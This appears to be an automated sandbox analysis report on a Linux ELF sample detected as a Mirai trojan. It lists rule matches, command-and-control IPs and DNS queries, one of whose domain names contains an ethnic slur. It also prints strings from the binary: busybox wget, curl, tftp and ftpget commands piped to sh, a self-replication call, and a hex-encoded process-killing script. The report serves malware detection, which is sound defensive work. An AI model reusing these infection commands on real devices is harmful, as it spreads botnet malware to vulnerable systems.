Source: nklx86.elf |
ReversingLabs: Detection: 52% |
Source: nklx86.elf |
String: /bin/busyboxincorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k/bin/busybox wget http:///curl.sh -o- | shGET /dlr. HTTP/1.0 |
Source: nklx86.elf |
String: .dThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A" |
Source: global traffic |
TCP traffic: 45.156.86.24 ports 38241,1,2,3,4,8 |
Source: global traffic |
TCP traffic: 185.150.24.67 ports 38241,1,2,3,4,8 |
Source: global traffic |
TCP traffic: 192.168.2.14:51304 -> 185.150.24.67:38241 |
Source: global traffic |
TCP traffic: 192.168.2.14:58788 -> 45.156.86.24:38241 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 140.50.195.125 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 177.233.137.127 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 137.198.169.164 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 167.76.226.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 187.84.208.61 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 183.162.101.195 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 138.199.211.255 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 167.84.253.140 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 114.72.197.191 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 36.82.130.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 39.64.28.45 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 179.105.167.227 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 100.36.37.32 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 28.47.137.211 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 167.176.53.217 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 69.72.168.215 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 198.225.119.135 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 121.65.230.143 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 209.157.111.212 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 15.247.255.202 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 223.240.23.97 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 55.205.72.40 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 194.107.216.250 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 79.26.50.29 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 115.226.107.160 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 79.139.80.207 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 17.61.111.250 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 100.188.142.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 161.228.14.242 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 157.8.49.157 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 49.60.237.11 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 48.55.57.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 5.105.206.243 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 131.121.242.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 4.245.117.158 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 75.56.164.22 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 194.82.103.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 121.239.220.23 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 78.76.177.104 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 41.15.138.211 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 15.150.191.57 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 223.171.8.24 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 183.201.20.71 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.112.17.49 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.169.138.8 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 171.45.56.202 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 134.182.182.185 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 44.237.52.141 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 69.19.145.232 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 159.175.74.254 |
Source: global traffic |
DNS traffic detected: DNS query: chinklabs.dyn |
Source: global traffic |
DNS traffic detected: DNS query: yellowchink.pirate |
Source: nklx86.elf |
String found in binary or memory: http:///curl.sh |
Source: nklx86.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown |
Source: nklx86.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown |
Source: nklx86.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown |
Source: nklx86.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown |
Source: 5801.1.0000000008048000.0000000008055000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown |
Source: 5801.1.0000000008048000.0000000008055000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown |
Source: 5801.1.0000000008048000.0000000008055000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown |
Source: 5801.1.0000000008048000.0000000008055000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox |
Source: Initial sample |
String containing 'busybox' found: usage: busybox |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox hostname PBOC |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox echo > |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox echo -ne |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox wget http:// |
Source: Initial sample |
String containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g |
Source: Initial sample |
String containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep |
Source: Initial sample |
String containing 'busybox' found: /bin/busyboxincorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k/bin/busybox wget http:///curl.sh -o- | shGET /dlr. HTTP/1.0 |
Source: Initial sample |
String containing 'busybox' found: .dThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x |
Source: ELF static info symbol of initial sample |
.symtab present: no |
Source: nklx86.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16 |
Source: nklx86.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16 |
Source: nklx86.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26 |
Source: nklx86.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26 |
Source: 5801.1.0000000008048000.0000000008055000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16 |
Source: 5801.1.0000000008048000.0000000008055000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16 |
Source: 5801.1.0000000008048000.0000000008055000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26 |
Source: 5801.1.0000000008048000.0000000008055000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26 |
Source: classification engine |
Classification label: mal64.troj.linELF@0/0@2/0 |